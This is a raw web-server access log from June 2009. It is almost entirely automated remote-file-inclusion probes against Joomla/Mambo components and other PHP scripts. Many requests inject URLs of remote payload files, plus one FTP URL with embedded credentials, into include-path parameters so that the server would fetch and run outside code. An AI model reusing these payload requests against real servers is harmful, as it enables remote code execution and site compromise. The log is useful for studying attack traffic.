122.153.28.140 - - [26/Jun/2009:19:02:49 -0500] "GET /encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.knt.hs.kr///id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
122.153.28.140 - - [26/Jun/2009:19:02:51 -0500] "GET /logs/access_log.1234224000/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.knt.hs.kr///id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
122.153.28.140 - - [26/Jun/2009:19:03:02 -0500] "GET /logs/access_log.1234483200/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.knt.hs.kr///id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:06:27 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:06:27 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:06:27 -0500] "GET /logs/access_log.1237680000/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:06:57 -0500] "GET /logs/access_log.1241308800/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
122.153.28.140 - - [26/Jun/2009:19:07:33 -0500] "GET /encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.knt.hs.kr///id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
122.153.28.140 - - [26/Jun/2009:19:07:33 -0500] "GET /logs/access_log.1234224000/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.knt.hs.kr///id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
122.153.28.140 - - [26/Jun/2009:19:07:33 -0500] "GET /logs/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.knt.hs.kr///id1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
122.153.28.140 - - [26/Jun/2009:19:07:48 -0500] "GET /logs/access_log.1234483200/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.knt.hs.kr///id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:10:18 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:10:18 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:10:18 -0500] "GET /logs/access_log.1240358400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
125.245.146.253 - - [26/Jun/2009:19:10:29 -0500] "GET /encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.knt.hs.kr///id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
125.245.146.253 - - [26/Jun/2009:19:10:29 -0500] "GET /logs/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.knt.hs.kr///id1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
125.245.146.253 - - [26/Jun/2009:19:10:29 -0500] "GET /logs/access_log.1234224000/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.knt.hs.kr///id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
125.245.146.253 - - [26/Jun/2009:19:10:29 -0500] "GET /logs/access_log.1234483200/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.knt.hs.kr///id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:10:52 -0500] "GET /logs/access_log.1239926400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
63.223.85.28 - - [26/Jun/2009:19:16:15 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
63.223.85.28 - - [26/Jun/2009:19:16:15 -0500] "GET /logs/access_log.1240617600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
63.223.85.28 - - [26/Jun/2009:19:16:15 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
63.223.85.28 - - [26/Jun/2009:19:16:21 -0500] "GET /logs/access_log.1240358400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
72.44.187.42 - - [26/Jun/2009:19:18:09 -0500] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.44.187.42 - - [26/Jun/2009:19:18:09 -0500] "GET /logs/access_log.1240444800/content/multithumb/multithumb?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.44.187.42 - - [26/Jun/2009:19:18:09 -0500] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:19:47 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:19:47 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:19:48 -0500] "GET /logs/access_log.1240444800/components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:20:28 -0500] "GET /logs/access_log.1235865600/components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
72.44.187.42 - - [26/Jun/2009:19:21:03 -0500] "GET /logs/access_log.1241136000/content/multithumb/multithumb?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
204.62.54.203 - - [26/Jun/2009:19:23:09 -0500] "GET /_vti_cnf?M=A HTTP/1.1" 301 334 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
204.62.54.203 - - [26/Jun/2009:19:23:10 -0500] "GET /_vti_cnf/?M=A HTTP/1.1" 200 676 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
83.16.182.130 - - [26/Jun/2009:19:23:17 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:23:17 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:23:17 -0500] "GET /logs/access_log.1240444800/components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:24:11 -0500] "GET /logs/access_log.1235865600/components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
65.55.208.123 - - [26/Jun/2009:19:24:55 -0500] "GET /logs/access_log.1121817600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [26/Jun/2009:19:24:55 -0500] "GET /logs/access_log.1187481600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.106.114 - - [26/Jun/2009:19:41:54 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.94.6.3 - - [26/Jun/2009:19:43:38 -0500] "GET //secpay.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.94.6.3 - - [26/Jun/2009:19:43:38 -0500] "GET /logs//secpay.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.94.6.3 - - [26/Jun/2009:19:43:38 -0500] "GET /logs/access_log.1240012800//secpay.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.94.6.3 - - [26/Jun/2009:19:44:07 -0500] "GET /logs/access_log.1236556800//secpay.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
91.198.32.3 - - [26/Jun/2009:19:46:09 -0500] "GET //?path%5Bdocroot%5D=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
91.198.32.3 - - [26/Jun/2009:19:46:11 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 200 194917 "-""libwww-perl/5.805"
83.16.182.130 - - [26/Jun/2009:19:46:49 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:46:49 -0500] "GET /logs/access_log.1240358400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:46:49 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.94.6.3 - - [26/Jun/2009:19:47:00 -0500] "GET //secpay.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.94.6.3 - - [26/Jun/2009:19:47:00 -0500] "GET /logs/access_log.1240012800//secpay.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.94.6.3 - - [26/Jun/2009:19:47:00 -0500] "GET /logs//secpay.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.94.6.3 - - [26/Jun/2009:19:47:06 -0500] "GET /logs/access_log.1236556800//secpay.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:47:07 -0500] "GET /logs/access_log.1239926400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:19:48:15 -0500] "GET /logs/access_log.1242000000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
65.55.208.134 - - [26/Jun/2009:19:52:26 -0500] "GET /logs/access_log.1214006400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [26/Jun/2009:19:52:26 -0500] "GET /logs/access_log.1167004800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
60.251.217.4 - - [26/Jun/2009:19:55:43 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:19:55:47 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:19:55:47 -0500] "GET /logs/access_log.1239321600//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:19:55:48 -0500] "GET /logs/access_log.1240444800//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.25.147.102 - - [26/Jun/2009:19:57:58 -0500] "GET /logs/[Scripthttp://www.m3h4x0r.xpg.com.br/000/abhieid.txt????? HTTP/1.1" 404 340 "-""libwww-perl/5.825"
85.25.147.102 - - [26/Jun/2009:19:57:58 -0500] "GET /[Scripthttp://www.m3h4x0r.xpg.com.br/000/abhieid.txt????? HTTP/1.1" 404 335 "-""libwww-perl/5.825"
91.198.32.3 - - [26/Jun/2009:19:59:16 -0500] "GET //?path%5Bdocroot%5D=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
91.198.32.3 - - [26/Jun/2009:19:59:17 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 200 194917 "-""libwww-perl/5.805"
218.150.78.245 - - [26/Jun/2009:20:02:43 -0500] "GET ///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:02:43 -0500] "GET /logs///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:02:43 -0500] "GET /logs/access_log.1238025600///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
59.125.5.1 - - [26/Jun/2009:20:03:00 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
59.125.5.1 - - [26/Jun/2009:20:03:00 -0500] "GET /logs/access_log.1230768000//tools/send_reminders.php?noSet=0&includedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
59.125.5.1 - - [26/Jun/2009:20:03:00 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
59.125.5.1 - - [26/Jun/2009:20:03:13 -0500] "GET /logs/access_log.1229299200//tools/send_reminders.php?noSet=0&includedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:02 -0500] "GET /logs/access_log.1236643200///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:02 -0500] "GET /logs/access_log.1239580800///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:02 -0500] "GET /logs/access_log.1236211200///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:03 -0500] "GET /logs/access_log.1237075200///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:30 -0500] "GET /logs/access_log.1239148800///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:30 -0500] "GET /logs/access_log.1236729600///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:30 -0500] "GET /logs/access_log.1238284800///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:31 -0500] "GET /logs/access_log.1237680000///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:31 -0500] "GET /logs/access_log.1237766400///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:31 -0500] "GET /logs/access_log.1233014400///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:31 -0500] "GET /logs/access_log.1240185600///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:31 -0500] "GET /logs/access_log.1236556800///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:38 -0500] "GET /logs/access_log.1239321600///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:38 -0500] "GET /logs/access_log.1237334400///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:38 -0500] "GET /logs/access_log.1237852800///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:38 -0500] "GET /logs/access_log.1237420800///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:38 -0500] "GET /logs/access_log.1240012800///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:38 -0500] "GET /logs/access_log.1238544000///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:38 -0500] "GET /logs/access_log.1239235200///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:38 -0500] "GET /logs/access_log.1237248000///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:38 -0500] "GET /logs/access_log.1236988800///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:38 -0500] "GET /logs/access_log.1239926400///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:38 -0500] "GET /logs/access_log.1240444800///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:38 -0500] "GET /logs/access_log.1235865600///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:39 -0500] "GET /logs/access_log.1238198400///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:39 -0500] "GET /logs/access_log.1236902400///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:43 -0500] "GET /logs/access_log.1240358400///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:43 -0500] "GET /logs/access_log.1238112000///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:43 -0500] "GET /logs/access_log.1239408000///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:43 -0500] "GET /logs/access_log.1239753600///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:43 -0500] "GET /logs/access_log.1240099200///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:43 -0500] "GET /logs/access_log.1239840000///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:43 -0500] "GET /logs/access_log.1238976000///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:20:04:43 -0500] "GET /logs/access_log.1237161600///administrator/components/com_artlinks/admin.artlinks.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
65.55.106.172 - - [26/Jun/2009:20:07:26 -0500] "GET /logs/access_log.1191801600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.16.107 - - [26/Jun/2009:20:15:56 -0500] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.38.16.107 - - [26/Jun/2009:20:16:02 -0500] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.38.16.107 - - [26/Jun/2009:20:16:10 -0500] "GET /logs/access_log.1240444800/content/multithumb/multithumb?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:20:19:09 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:20:19:09 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:20:19:09 -0500] "GET /logs/access_log.1240358400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:20:19:14 -0500] "GET /logs/access_log.1239926400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
201.9.250.138 - - [26/Jun/2009:20:19:33 -0500] "GET /logs/access_log.1239667200ftp://sln:solon000@ftp.xpg.com.br/cmd1.txt? HTTP/1.1" 404 351 "-""Mozilla/3.0 (compatible; Indy Library)"
201.9.250.138 - - [26/Jun/2009:20:19:34 -0500] "GET /logs/access_log.1242432000ftp://sln:solon000@ftp.xpg.com.br/cmd1.txt? HTTP/1.1" 404 351 "-""Mozilla/3.0 (compatible; Indy Library)"
201.9.250.138 - - [26/Jun/2009:20:19:35 -0500] "GET /logs/access_log.1241740800ftp://sln:solon000@ftp.xpg.com.br/cmd1.txt? HTTP/1.1" 404 351 "-""Mozilla/3.0 (compatible; Indy Library)"
201.9.250.138 - - [26/Jun/2009:20:19:36 -0500] "GET /logs/access_log.1241136000ftp://sln:solon000@ftp.xpg.com.br/cmd1.txt? HTTP/1.1" 404 351 "-""Mozilla/3.0 (compatible; Indy Library)"
72.82.228.83 - - [26/Jun/2009:20:19:43 -0500] "GET /logs/access_log.1242000000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:20:19:43 -0500] "GET /logs/access_log.1241913600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:20:20:26 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:20:20:30 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
